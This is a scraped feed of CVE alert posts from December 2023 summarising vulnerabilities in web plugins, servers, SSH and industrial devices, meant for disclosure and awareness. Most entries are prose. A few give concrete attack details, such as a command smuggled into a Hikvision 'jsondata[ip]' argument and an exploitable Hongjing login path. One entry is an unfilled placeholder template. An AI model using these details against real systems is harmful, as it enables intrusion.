🚨 CVE-2023-41337h2o is an HTTP server with support for HTTP/1.x, HTTP/2 and HTTP/3. In version 2.3.0-beta2 and prior, when h2o is configured to listen to multiple addresses or ports with each of them using different backend servers managed by multiple entities, a malicious backend entity that also has the opportunity to observe or inject packets exchanged between the client and h2o may misdirect HTTPS requests going to other backends and observe the contents of that HTTPS request being sent.The attack involves a victim client trying to resume a TLS connection and an attacker redirecting the packets to a different address or port than that intended by the client. The attacker must already have been configured by the administrator of h2o to act as a backend to one of the addresses or ports that the h2o instance listens to. Session IDs and tickets generated by h2o are not bound to information specific to the server address, port, or the X.509 certificate, and therefore it is possible for an attacker to force the victim connection to wrongfully resume against a different server address or port on which the same h2o instance is listening.Once a TLS session is misdirected to resume to a server address / port that is configured to use an attacker-controlled server as the backend, depending on the configuration, HTTPS requests from the victim client may be forwarded to the attacker's server.An H2O instance is vulnerable to this attack only if the instance is configured to listen to different addresses or ports using the listen directive at the host level and the instance is configured to connect to backend servers managed by multiple entities.A patch is available at commit 35760540337a47e5150da0f4a66a609fad2ef0ab. As a workaround, one may stop using using host-level listen directives in favor of global-level ones.🎖@cveNotify |
|
| 2023-12-19 18:54:46 |
🚨 CVE-2023-50871In JetBrains YouTrack before 2023.3.22268 authorization check for inline comments inside thread replies was missed🎖@cveNotify |
|
| 2023-12-19 18:54:39 |
🚨 CVE-2023-50870In JetBrains TeamCity before 2023.11.1 a CSRF on login was possible🎖@cveNotify |
|
| 2023-12-19 18:54:38 |
🚨 CVE-2023-49842Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in wpexpertsio Rocket Maintenance Mode & Coming Soon Page allows Stored XSS.This issue affects Rocket Maintenance Mode & Coming Soon Page: from n/a through 4.3.🎖@cveNotify |
|
| 2023-12-19 18:54:37 |
🚨 CVE-2023-49150Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CurrencyRate.Today Crypto Converter Widget allows Stored XSS.This issue affects Crypto Converter Widget: from n/a through 1.8.1.🎖@cveNotify |
|
| 2023-12-19 18:54:33 |
🚨 CVE-2023-6545The package authelia-bhf included in Beckhoffs TwinCAT/BSD is prone to an open redirect that allows a remote unprivileged attacker to redirect a user to another site. This may have limited impact to integrity and does solely affect anthelia-bhf the Beckhoff fork of authelia.🎖@cveNotify |
|
| 2023-12-19 18:54:32 |
🚨 CVE-2023-25651There is a SQL injection vulnerability in some ZTE mobile internet products. Due to insufficient input validation of SMS interface parameter, an authenticated attacker could use the vulnerability to execute SQL injection and cause information leak.🎖@cveNotify |
|
| 2023-12-19 18:24:33 |
🚨 CVE-2023-49149Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CurrencyRate.Today Currency Converter Calculator allows Stored XSS.This issue affects Currency Converter Calculator: from n/a through 1.3.1.🎖@cveNotify |
|
| 2023-12-19 18:24:32 |
🚨 CVE-2023-49739[PROBLEMTYPE] in [COMPONENT] in [VENDOR] [PRODUCT] [VERSION] on [PLATFORMS] allows [ATTACKER] to [IMPACT] via [VECTOR]🎖@cveNotify |
|
| 2023-12-19 17:54:38 |
🚨 CVE-2023-46279Deserialization of Untrusted Data vulnerability in Apache Dubbo.This issue only affects Apache Dubbo 3.1.5.Users are recommended to upgrade to the latest version, which fixes the issue.🎖@cveNotify |
|
| 2023-12-19 17:54:37 |
🚨 CVE-2023-48780Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in EnigmaWeb WP Catalogue allows Stored XSS.This issue affects WP Catalogue: from n/a through 1.7.6.🎖@cveNotify |
|
| 2023-12-19 17:54:33 |
🚨 CVE-2023-6368In WhatsUp Gold versions released before 2023.1, an API endpoint was found to be missing an authentication mechanism. It is possible for an unauthenticated attacker to enumerate information related to a registered device being monitored by WhatsUp Gold.🎖@cveNotify |
|
| 2023-12-19 17:54:32 |
🚨 CVE-2022-45365Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Aleksandar Uroševi? Stock Ticker allows Reflected XSS.This issue affects Stock Ticker: from n/a through 3.23.2.🎖@cveNotify |
|
| 2023-12-19 17:24:37 |
🚨 CVE-2023-50918app/Controller/AuditLogsController.php in MISP before 2.4.182 mishandles ACLs for audit logs.🎖@cveNotify |
|
| 2023-12-19 17:24:33 |
🚨 CVE-2023-49707SQLi vulnerability in S5 Register module for Joomla.🎖@cveNotify |
|
| 2023-12-19 17:24:32 |
🚨 CVE-2023-4486Under certain circumstances, invalid authentication credentials could be sent to the login endpoint of Johnson Controls Metasys NAE55, SNE, and SNC engines prior to versions 11.0.6 and 12.0.4 and Facility Explorer F4-SNC engines prior to versions 11.0.6 and 12.0.4 to cause denial-of-service.🎖@cveNotify |
|
| 2023-12-19 16:54:37 |
🚨 CVE-2023-6365In WhatsUp Gold versions released before 2023.1, a stored cross-site scripting (XSS) vulnerability has been identified. It is possible for an attacker to craft a XSS payload and store that value within a device group. If a WhatsUp Gold user interacts with the crafted payload, the attacker would be able to execute malicious JavaScript within the context of the victims browser.🎖@cveNotify |
|
| 2023-12-19 16:54:33 |
🚨 CVE-2023-48665Dell vApp Manager, versions prior to 9.2.4.x contain a command injection vulnerability. A remote malicious user with high privileges could potentially exploit this vulnerability leading to the execution of arbitrary OS commands on the affected system.🎖@cveNotify |
|
| 2023-12-19 16:54:32 |
🚨 CVE-2023-48225Laf is a cloud development platform. Prior to version 1.0.0-beta.13, the control of LAF app enV is not strict enough, and in certain scenarios of privatization environment, it may lead to sensitive information leakage in secret and configmap. In ES6 syntax, if an obj directly references another obj, the name of the obj itself will be used as the key, and the entire object structure will be integrated intact. When constructing the deployment instance of the app, env was found from the database and directly inserted into the template, resulting in controllability here. Sensitive information in the secret and configmap can be read through the k8s envFrom field. In a privatization environment, when `namespaceConf. fixed` is marked, it may lead to the leakage of sensitive information in the system. As of time of publication, it is unclear whether any patches or workarounds exist.🎖@cveNotify |
|
| 2023-12-19 16:24:45 |
🚨 CVE-2023-43870When installing the Net2 software a root certificate is installed into the trusted store. A potential hacker could access the installer batch file or reverse engineer the source code to gain access to the root certificate password. Using the root certificate and password they could then create their own certificates to emulate another site. Then by establishing a proxy service to emulate the site they could monitor traffic passed between the end user and the site allowing access to the data content.🎖@cveNotify |
|
| 2023-12-19 16:24:39 |
🚨 CVE-2023-1514A vulnerability exists in the component RTU500 Scripting interface. When a client connects to a server using TLS, the server presents a certificate. This certificate links a public key to the identity of the service and is signed by a Certification Authority (CA), allowing the client to validate that the remote service can be trusted and is not malicious. If the client does not validate the parameters of the certificate, then attackers could be able to spoof the identity of the service. An attacker could exploit the vulnerability by using faking the identity of a RTU500 device and intercepting the messages initiated via the RTU500 Scripting interface.🎖@cveNotify |
|
| 2023-12-19 16:24:38 |
🚨 CVE-2023-40657A reflected XSS vulnerability was discovered in the Joomdoc component for Joomla.🎖@cveNotify |
|
| 2023-12-19 16:24:37 |
🚨 CVE-2023-49938An issue was discovered in SchedMD Slurm 22.05.x and 23.02.x. There is Incorrect Access Control: an attacker can modified their extended group list that is used with the sbcast subsystem, and open files with an unauthorized set of extended groups. The fixed versions are 22.05.11 and 23.02.7.🎖@cveNotify |
|
| 2023-12-19 16:24:34 |
🚨 CVE-2023-41618Emlog Pro v2.1.14 was discovered to contain a reflective cross-site scripting (XSS) vulnerability via the component /admin/article.php?active_savedraft.🎖@cveNotify |
|
| 2023-12-19 16:24:33 |
🚨 CVE-2023-40660A flaw was found in OpenSC packages that allow a potential PIN bypass. When a token/card is authenticated by one process, it can perform cryptographic operations in other processes when an empty zero-length pin is passed. This issue poses a security risk, particularly for OS logon/screen unlock and for small, permanently connected tokens to computers. Additionally, the token can internally track login status. This flaw allows an attacker to gain unauthorized access, carry out malicious actions, or compromise the system without the user's awareness.🎖@cveNotify |
|
| 2023-12-19 16:24:32 |
🚨 CVE-2023-22518All versions of Confluence Data Center and Server are affected by this unexploited vulnerability. This Improper Authorization vulnerability allows an unauthenticated attacker to reset Confluence and create a Confluence instance administrator account. Using this account, an attacker can then perform all administrative actions that are available to Confluence instance administrator leading to - but not limited to - full loss of confidentiality, integrity and availability. Atlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.🎖@cveNotify |
|
| 2023-12-19 15:54:46 |
🚨 CVE-2023-6364In WhatsUp Gold versions released before 2023.1, a stored cross-site scripting (XSS) vulnerability has been identified. It is possible for an attacker to craft a XSS payload and store that value within a dashboard component. If a WhatsUp Gold user interacts with the crafted payload, the attacker would be able to execute malicious JavaScript within the context of the victims browser.🎖@cveNotify |
|
| 2023-12-19 15:54:39 |
🚨 CVE-2023-47623Scrypted is a home video integration and automation platform. In versions 0.55.0 and prior, a reflected cross-site scripting vulnerability exists in the login page via the `redirect_uri` parameter. By specifying a url with the javascript scheme (`javascript:`), an attacker can run arbitrary JavaScript code after the login. As of time of publication, no known patches are available.🎖@cveNotify |
|
| 2023-12-19 15:54:38 |
🚨 CVE-2023-50262Dompdf is an HTML to PDF converter for PHP. When parsing SVG images Dompdf performs an initial validation to ensure that paths within the SVG are allowed. One of the validations is that the SVG document does not reference itself. However, prior to version 2.0.4, a recursive chained using two or more SVG documents is not correctly validated. Depending on the system configuration and attack pattern this could exhaust the memory available to the executing process and/or to the server itself.php-svg-lib, when run in isolation, does not support SVG references for `image` elements. However, when used in combination with Dompdf, php-svg-lib will process SVG images referenced by an `image` element. Dompdf currently includes validation to prevent self-referential `image` references, but a chained reference is not checked. A malicious actor may thus trigger infinite recursion by chaining references between two or more SVG images.When Dompdf parses a malicious payload, it will crash due after exceeding the allowed execution time or memory usage. An attacker sending multiple request to a system can potentially cause resource exhaustion to the point that the system is unable to handle incoming request.Version 2.0.4 contains a fix for this issue.🎖@cveNotify |
|
| 2023-12-19 15:54:33 |
🚨 CVE-2023-49296The Arduino Create Agent allows users to use the Arduino Create applications to upload code to any USB connected Arduino board directly from the browser. A vulnerability in versions prior to 1.3.6 affects the endpoint `/certificate.crt` and the way the web interface of the ArduinoCreateAgent handles custom error messages. An attacker that is able to persuade a victim into clicking on a malicious link can perform a Reflected Cross-Site Scripting attack on the web interface of the create agent, which would allow the attacker to execute arbitrary browser client side code. Version 1.3.6 contains a fix for the issue.🎖@cveNotify |
|
| 2023-12-19 15:24:49 |
🚨 CVE-2023-6913A session hijacking vulnerability has been detected in the Imou Life application affecting version 6.7.0. This vulnerability could allow an attacker to hijack user accounts due to the QR code functionality not properly filtering codes when scanning a new device and directly running WebView without prompting or displaying it to the user. This vulnerability could trigger phishing attacks.🎖@cveNotify |
|
| 2023-12-19 15:24:45 |
🚨 CVE-2023-6280An XXE (XML External Entity) vulnerability has been detected in 52North WPS affecting versions prior to 4.0.0-beta.11. This vulnerability allows the use of external entities in its WebProcessingService servlet for an attacker to retrieve files by making HTTP requests to the internal network.🎖@cveNotify |
|
| 2023-12-19 15:24:44 |
🚨 CVE-2023-49736A where_in JINJA macro allows users to specify a quote, which combined with a carefully crafted statement would allow for SQL injection in Apache Superset.This issue affects Apache Superset: before 2.1.2, from 3.0.0 before 3.0.2.Users are recommended to upgrade to version 3.0.2, which fixes the issue.🎖@cveNotify |
|
| 2023-12-19 15:24:39 |
🚨 CVE-2023-46104Uncontrolled resource consumption can be triggered by authenticated attacker that uploads a malicious ZIP to import database, dashboards or datasets. This vulnerability exists in Apache Superset versions up to and including 2.1.2 and versions 3.0.0, 3.0.1.🎖@cveNotify |
|
| 2023-12-19 15:24:38 |
🚨 CVE-2023-49923An issue was discovered by Elastic whereby the Documents API of App Search logged the raw contents of indexed documents at INFO log level. Depending on the contents of such documents, this could lead to the insertion of sensitive or private information in the App Search logs. Elastic has released 8.11.2 and 7.17.16 that resolves this issue by changing the log level at which these are logged to DEBUG, which is disabled by default.🎖@cveNotify |
|
| 2023-12-19 15:24:33 |
🚨 CVE-2023-5499Information exposure vulnerability in Shenzhen Reachfar v28, the exploitation of which could allow a remote attacker to retrieve all the week's logs stored in the 'log2' directory. An attacker could retrieve sensitive information such as remembered wifi networks, sent messages, SOS device locations and device configurations.🎖@cveNotify |
|
| 2023-12-19 15:24:32 |
🚨 CVE-2023-41890Sustainsys.Saml2 library adds SAML2P support to ASP.NET web sites, allowing the web site to act as a SAML2 Service Provider. Prior to versions 1.0.3 and 2.9.2, when a response is processed, the issuer of the Identity Provider is not sufficiently validated. This could allow a malicious identity provider to craft a Saml2 response that is processed as if issued by another identity provider. It is also possible for a malicious end user to cause stored state intended for one identity provider to be used when processing the response from another provider. An application is impacted if they rely on any of these features in their authentication/authorization logic: the issuer of the generated identity and claims; or items in the stored request state (AuthenticationProperties). This issue is patched in versions 2.9.2 and 1.0.3. The `AcsCommandResultCreated` notification can be used to add the validation required if an upgrade to patched packages is not possible.🎖@cveNotify |
|
| 2023-12-19 14:54:37 |
🚨 CVE-2023-6702Type confusion in V8 in Google Chrome prior to 120.0.6099.109 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-12-19 14:54:33 |
🚨 CVE-2023-47619Audiobookshelf is a self-hosted audiobook and podcast server. In versions 2.4.3 and prior, users with the update permission are able to read arbitrary files, delete arbitrary files and send a GET request to arbitrary URLs and read the response. This issue may lead to Information Disclosure. As of time of publication, no patches are available.🎖@cveNotify |
|
| 2023-12-19 14:24:32 |
🚨 CVE-2023-6448Unitronics VisiLogic before version 9.9.00, used in Vision and Samba PLCs and HMIs, uses a default administrative password. An unauthenticated attacker with network access can take administrative control of a vulnerable system.🎖@cveNotify |
|
| 2023-12-19 13:54:51 |
🚨 CVE-2023-48773Cross-Site Request Forgery (CSRF) vulnerability in WP Doctor WooCommerce Login Redirect.This issue affects WooCommerce Login Redirect: from n/a through 2.2.4.🎖@cveNotify |
|
| 2023-12-19 13:54:50 |
🚨 CVE-2023-48769Cross-Site Request Forgery (CSRF) vulnerability in Blue Coral Chat Bubble – Floating Chat with Contact Chat Icons, Messages, Telegram, Email, SMS, Call me back.This issue affects Chat Bubble – Floating Chat with Contact Chat Icons, Messages, Telegram, Email, SMS, Call me back: from n/a through 2.3.🎖@cveNotify |
|
| 2023-12-19 13:54:49 |
🚨 CVE-2023-48768Cross-Site Request Forgery (CSRF) vulnerability in CodeAstrology Team Quantity Plus Minus Button for WooCommerce by CodeAstrology.This issue affects Quantity Plus Minus Button for WooCommerce by CodeAstrology: from n/a through 1.1.9.🎖@cveNotify |
|
| 2023-12-19 13:54:46 |
🚨 CVE-2023-46686A reliance on untrusted inputs in a security decision could be exploited by a privileged user to configure the Gallagher Command Centre Diagnostics Service to use less secure communication protocols. This issue affects: Gallagher Diagnostics Service prior to v1.3.0 (distributed in 9.00.1507(MR1)).🎖@cveNotify |
|
| 2023-12-19 13:54:45 |
🚨 CVE-2023-24590A format string issue in the Controller 6000's optional diagnostic web interface can be used to write/read from memory, and in some instances crash the Controller 6000 leading to a Denial of Service.This issue affects: Gallagher Controller 6000 8.60 prior to vCR8.60.231116a (distributed in 8.60.2550 (MR7)), all versions of 8.50 and prior.🎖@cveNotify |
|
| 2023-12-19 13:54:44 |
🚨 CVE-2023-23576Incorrect behavior order in the Command Centre Server could allow privileged users to gain physical access to the site for longer than intended after a network outage when competencies are used in the access decision. This issue affects: Gallagher Command Centre: 8.90 prior to vEL8.90.1620 (MR2), 8.80 prior to vEL8.80.1369 (MR3), 8.70 prior to vEL8.70.2375 (MR5), 8.60 prior to vEL8.60.2550 (MR7), all versions of 8.50 and prior.🎖@cveNotify |
|
| 2023-12-19 13:54:39 |
🚨 CVE-2023-22439Improper input validation of a large HTTP request in the Controller 6000 and Controller 7000 optional diagnostic web interface (Port 80) can be used to perform a Denial of Service of the diagnostic web interface.This issue affects: Gallagher Controller 6000 and 7000 8.90 prior to vCR8.90.231204a (distributed in 8.90.1620 (MR2)), 8.80 prior to vCR8.80.231204a (distributed in 8.80.1369 (MR3)), 8.70 prior to vCR8.70.231204a (distributed in 8.70.2375 (MR5)), 8.60 prior to vCR8.60.231116a (distributed in 8.60.2550 (MR7)), all versions of 8.50 and prior.🎖@cveNotify |
|
| 2023-12-19 13:54:38 |
🚨 CVE-2023-6889Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.17.🎖@cveNotify |
|
| 2023-12-19 13:54:34 |
🚨 CVE-2023-49169Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in datafeedr.Com Ads by datafeedr.Com allows Stored XSS.This issue affects Ads by datafeedr.Com: from n/a through 1.2.0.🎖@cveNotify |
|
| 2023-12-19 13:54:33 |
🚨 CVE-2023-6838Reflected XSS vulnerability can be exploited by tampering a request parameter in Authentication Endpoint. This can be performed in both authenticated and unauthenticated requests.🎖@cveNotify |
|
| 2023-12-19 13:24:33 |
🚨 CVE-2023-6730Deserialization of Untrusted Data in GitHub repository huggingface/transformers prior to 4.36.🎖@cveNotify |
|
| 2023-12-19 13:24:32 |
🚨 CVE-2023-49170Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in captainform Forms by CaptainForm – Form Builder for WordPress allows Reflected XSS.This issue affects Forms by CaptainForm – Form Builder for WordPress: from n/a through 2.5.3.🎖@cveNotify |
|
| 2023-12-19 11:24:32 |
🚨 CVE-2023-4154A design flaw was found in Samba's DirSync control implementation, which exposes passwords and secrets in Active Directory to privileged users and Read-Only Domain Controllers (RODCs). This flaw allows RODCs and users possessing the GET_CHANGES right to access all attributes, including sensitive secrets and passwords. Even in a default setup, RODC DC accounts, which should only replicate some passwords, can gain access to all domain secrets, including the vital krbtgt, effectively eliminating the RODC / DC distinction. Furthermore, the vulnerability fails to account for error conditions (fail open), like out-of-memory situations, potentially granting access to secret attributes, even under low-privileged attacker influence.🎖@cveNotify |
|
| 2023-12-19 10:24:37 |
🚨 CVE-2023-49736A where_in JINJA macro allows users to specify a quote, which combined with a carefully crafted statement would allow for SQL injection in Apache Superset.This issue affects Apache Superset: before 2.1.2, from 3.0.0 before 3.0.2.Users are recommended to upgrade to version 3.0.2, which fixes the issue.🎖@cveNotify |
|
| 2023-12-19 10:24:33 |
🚨 CVE-2023-49489Reflective Cross Site Scripting (XSS) vulnerability in KodeExplorer version 4.51, allows attackers to obtain sensitive information and escalate privileges via the APP_HOST parameter at config/i18n/en/main.php.🎖@cveNotify |
|
| 2023-12-19 10:24:32 |
🚨 CVE-2023-5869A flaw was found in PostgreSQL that allows authenticated database users to execute arbitrary code through missing overflow checks during SQL array value modification. This issue exists due to an integer overflow during array modification where a remote user can trigger the overflow by providing specially crafted data. This enables the execution of arbitrary code on the target system, allowing users to write arbitrary bytes to memory and extensively read the server's memory.🎖@cveNotify |
|
| 2023-12-19 09:24:38 |
🚨 CVE-2023-50376Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in smp7, wp.Insider Simple Membership allows Reflected XSS.This issue affects Simple Membership: from n/a through 4.3.8.🎖@cveNotify |
|
| 2023-12-19 09:24:33 |
🚨 CVE-2023-6895A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been declared as critical. This vulnerability affects unknown code of the file /php/ping.php. The manipulation of the argument jsondata[ip] with the input netstat -ano leads to os command injection. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. VDB-248254 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-19 09:24:32 |
🚨 CVE-2023-6655A vulnerability, which was classified as critical, has been found in Hongjing e-HR 2020. Affected by this issue is some unknown functionality of the file /w_selfservice/oauthservlet/%2e./.%2e/general/inform/org/loadhistroyorgtree of the component Login Interface. The manipulation of the argument parentid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-247358 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-19 06:24:32 |
🚨 CVE-2020-27792A heap-based buffer overwrite vulnerability was found in GhostScript's lp8000_print_page() function in the gdevlp8k.c file. This flaw allows an attacker to trick a user into opening a crafted PDF file, triggering the heap buffer overflow that could lead to memory corruption or a denial of service.🎖@cveNotify |
|
| 2023-12-19 05:24:32 |
🚨 CVE-2023-48795The SSH transport protocol with certain OpenSSH extensions, found in OpenSSH before 9.6 and other products, allows remote attackers to bypass integrity checks such that some packets are omitted (from the extension negotiation message), and a client and server may consequently end up with a connection for which some security features have been downgraded or disabled, aka a Terrapin attack. This occurs because the SSH Binary Packet Protocol (BPP), implemented by these extensions, mishandles the handshake phase and mishandles use of sequence numbers. For example, there is an effective attack against SSH's use of ChaCha20-Poly1305 (and CBC with Encrypt-then-MAC). The bypass occurs in chacha20-poly1305@openssh.com and (if CBC is used) the -etm@openssh.com MAC algorithms. This also affects Maverick Synergy Java SSH API before 3.1.0-SNAPSHOT, Dropbear through 2022.83, Ssh before 5.1.1 in Erlang/OTP, PuTTY before 0.80, AsyncSSH before 2.14.2, golang.org/x/crypto before 0.17.0, libssh before 0.10.6, and libssh2 through 1.11.0; and there could be effects on Bitvise SSH through 9.31.🎖@cveNotify |
|
| 2023-12-19 04:24:32 |
🚨 CVE-2023-49797PyInstaller bundles a Python application and all its dependencies into a single package. A PyInstaller built application, elevated as a privileged process, may be tricked by an unprivileged attacker into deleting files the unprivileged user does not otherwise have access to. A user is affected if **all** the following are satisfied: 1. The user runs an application containing either `matplotlib` or `win32com`. 2. The application is ran as administrator (or at least a user with higher privileges than the attacker). 3. The user's temporary directory is not locked to that specific user (most likely due to `TMP`/`TEMP` environment variables pointing to an unprotected, arbitrary, non default location). Either: A. The attacker is able to very carefully time the replacement of a temporary file with a symlink. This switch must occur exactly between `shutil.rmtree()`'s builtin symlink check and the deletion itself B: The application was built with Python 3.7.x or earlier which has no protection against Directory Junctions links. The vulnerability has been addressed in PR #7827 which corresponds to `pyinstaller >= 5.13.1`. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-12-19 03:24:38 |
🚨 CVE-2019-25157A vulnerability was found in Ethex Contracts. It has been classified as critical. This affects an unknown part of the file EthexJackpot.sol of the component Monthly Jackpot Handler. The manipulation leads to improper access controls. It is possible to initiate the attack remotely. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The patch is named 6b8664b698d3d953e16c284fadc6caeb9e58e3db. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-248271.🎖@cveNotify |
|
| 2023-12-19 03:24:37 |
🚨 CVE-2014-125107A vulnerability was found in Corveda PHPSandbox 1.3.4 and classified as critical. Affected by this issue is some unknown functionality of the component String Handler. The manipulation leads to protection mechanism failure. The attack may be launched remotely. Upgrading to version 1.3.5 is able to address this issue. The patch is identified as 48fde5ffa4d76014bad260a3cbab7ada3744a4cc. It is recommended to upgrade the affected component. VDB-248270 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-19 03:24:33 |
🚨 CVE-2023-48661Dell vApp Manager, versions prior to 9.2.4.x contain an arbitrary file read vulnerability. A remote malicious user with high privileges could potentially exploit this vulnerability to read arbitrary files from the target system.🎖@cveNotify |
|
| 2023-12-19 03:24:32 |
🚨 CVE-2023-49797PyInstaller bundles a Python application and all its dependencies into a single package. A PyInstaller built application, elevated as a privileged process, may be tricked by an unprivileged attacker into deleting files the unprivileged user does not otherwise have access to. A user is affected if **all** the following are satisfied: 1. The user runs an application containing either `matplotlib` or `win32com`. 2. The application is ran as administrator (or at least a user with higher privileges than the attacker). 3. The user's temporary directory is not locked to that specific user (most likely due to `TMP`/`TEMP` environment variables pointing to an unprotected, arbitrary, non default location). Either: A. The attacker is able to very carefully time the replacement of a temporary file with a symlink. This switch must occur exactly between `shutil.rmtree()`'s builtin symlink check and the deletion itself B: The application was built with Python 3.7.x or earlier which has no protection against Directory Junctions links. The vulnerability has been addressed in PR #7827 which corresponds to `pyinstaller >= 5.13.1`. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-12-19 02:54:37 |
🚨 CVE-2023-50017Dreamer CMS v4.1.3 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /admin/database/backup🎖@cveNotify |
|
| 2023-12-19 02:54:33 |
🚨 CVE-2023-48770Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Nima Saberi Aparat allows Stored XSS.This issue affects Aparat: from n/a through 1.7.1.🎖@cveNotify |
|
| 2023-12-19 02:54:32 |
🚨 CVE-2023-46247Vyper is a Pythonic Smart Contract Language for the Ethereum Virtual Machine (EVM). Contracts containing large arrays might underallocate the number of slots they need by 1. Prior to v0.3.8, the calculation to determine how many slots a storage variable needed used `math.ceil(type_.size_in_bytes / 32)`. The intermediate floating point step can produce a rounding error if there are enough bits set in the IEEE-754 mantissa. Roughly speaking, if `type_.size_in_bytes` is large (> 2**46), and slightly less than a power of 2, the calculation can overestimate how many slots are needed by 1. If `type_.size_in_bytes` is slightly more than a power of 2, the calculation can underestimate how many slots are needed by 1. This issue is patched in version 0.3.8.🎖@cveNotify |
|
| 2023-12-19 02:24:38 |
🚨 CVE-2023-6488The WP Shortcodes Plugin — Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'su_button', 'su_members', and 'su_tabs' shortcodes in all versions up to, and including, 7.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-12-19 02:24:37 |
🚨 CVE-2022-43843IBM Spectrum Scale 5.1.5.0 through 5.1.5.1 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 239080.🎖@cveNotify |
|
| 2023-12-19 02:24:33 |
🚨 CVE-2023-45174IBM AIX 7.2, 7.3, and VIOS 3.1 could allow a privileged local user to exploit a vulnerability in the qdaemon command to escalate privileges or cause a denial of service. IBM X-Force ID: 267972.🎖@cveNotify |
|
| 2023-12-19 02:24:32 |
🚨 CVE-2023-49877IBM System Storage Virtualization Engine TS7700 3957-VEC, 3948-VED and 3957-VEC could allow a remote authenticated user to obtain sensitive information, caused by improper filtering of URLs. By submitting a specially crafted HTTP GET request, an attacker could exploit this vulnerability to view application source code, system configuration information, or other sensitive data related to the Management Interface. IBM X-Force ID: 272651.🎖@cveNotify |
|
| 2023-12-19 01:54:37 |
🚨 CVE-2023-45184IBM i Access Client Solutions 1.1.2 through 1.1.4 and 1.1.4.3 through 1.1.9.3 could allow an attacker to obtain a decryption key due to improper authority checks. IBM X-Force ID: 268270.🎖@cveNotify |
|
| 2023-12-19 01:54:33 |
🚨 CVE-2023-41719A vulnerability exists on all versions of Ivanti Connect Secure below 22.6R2 where an attacker impersonating an administrator may craft a specific web request which may lead to remote code execution.🎖@cveNotify |
|
| 2023-12-19 01:54:32 |
🚨 CVE-2023-50246jq is a command-line JSON processor. Version 1.7 is vulnerable to heap-based buffer overflow. Version 1.7.1 contains a patch for this issue.🎖@cveNotify |
|
| 2023-12-19 01:24:32 |
🚨 CVE-2023-44982Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Jordy Meow Perfect Images (Manage Image Sizes, Thumbnails, Replace, Retina).This issue affects Perfect Images (Manage Image Sizes, Thumbnails, Replace, Retina): from n/a through 6.4.5.🎖@cveNotify |
|
| 2023-12-19 00:24:38 |
🚨 CVE-2023-49819Deserialization of Untrusted Data vulnerability in Gordon Böhme, Antonio Leutsch Structured Content (JSON-LD) #wpsc.This issue affects Structured Content (JSON-LD) #wpsc: from n/a through 1.5.3.🎖@cveNotify |
|
| 2023-12-19 00:24:37 |
🚨 CVE-2023-48751Missing Authorization, Cross-Site Request Forgery (CSRF) vulnerability in Roland Barker, xnau webdesign Participants Database allows Accessing Functionality Not Properly Constrained by ACLs, Cross Site Request Forgery.This issue affects Participants Database: from n/a through 2.5.5.🎖@cveNotify |
|
| 2023-12-19 00:24:33 |
🚨 CVE-2023-46212Missing Authorization, Cross-Site Request Forgery (CSRF) vulnerability in TienCOP WP EXtra allows Accessing Functionality Not Properly Constrained by ACLs, Cross Site Request Forgery.This issue affects WP EXtra: from n/a through 6.2.🎖@cveNotify |
|
| 2023-12-19 00:24:32 |
🚨 CVE-2023-48795The SSH transport protocol with certain OpenSSH extensions, found in OpenSSH before 9.6 and other products, allows remote attackers to bypass integrity checks such that some packets are omitted (from the extension negotiation message), and a client and server may consequently end up with a connection for which some security features have been downgraded or disabled, aka a Terrapin attack. This occurs because the SSH Binary Packet Protocol (BPP), implemented by these extensions, mishandles the handshake phase and mishandles use of sequence numbers. For example, there is an effective attack against SSH's use of ChaCha20-Poly1305 (and CBC with Encrypt-then-MAC). The bypass occurs in chacha20-poly1305@openssh.com and (if CBC is used) the -etm@openssh.com MAC algorithms. This also affects Maverick Synergy Java SSH API before 3.1.0-SNAPSHOT, Dropbear through 2022.83, Ssh before 5.1.1 in Erlang/OTP, PuTTY before 0.80, AsyncSSH before 2.14.2, golang.org/x/crypto before 0.17.0, and libssh before 0.10.6; and there could be effects on Bitvise SSH through 9.31.🎖@cveNotify |
|
| 2023-12-18 23:24:45 |
🚨 CVE-2023-49761Cross-Site Request Forgery (CSRF) vulnerability in Gravity Master Product Enquiry for WooCommerce.This issue affects Product Enquiry for WooCommerce: from n/a through 3.0.🎖@cveNotify |
|
| 2023-12-18 23:24:39 |
🚨 CVE-2023-49760Cross-Site Request Forgery (CSRF) vulnerability in Giannopoulos Kostas WPsoonOnlinePage.This issue affects WPsoonOnlinePage: from n/a through 1.9.🎖@cveNotify |
|
| 2023-12-18 23:24:38 |
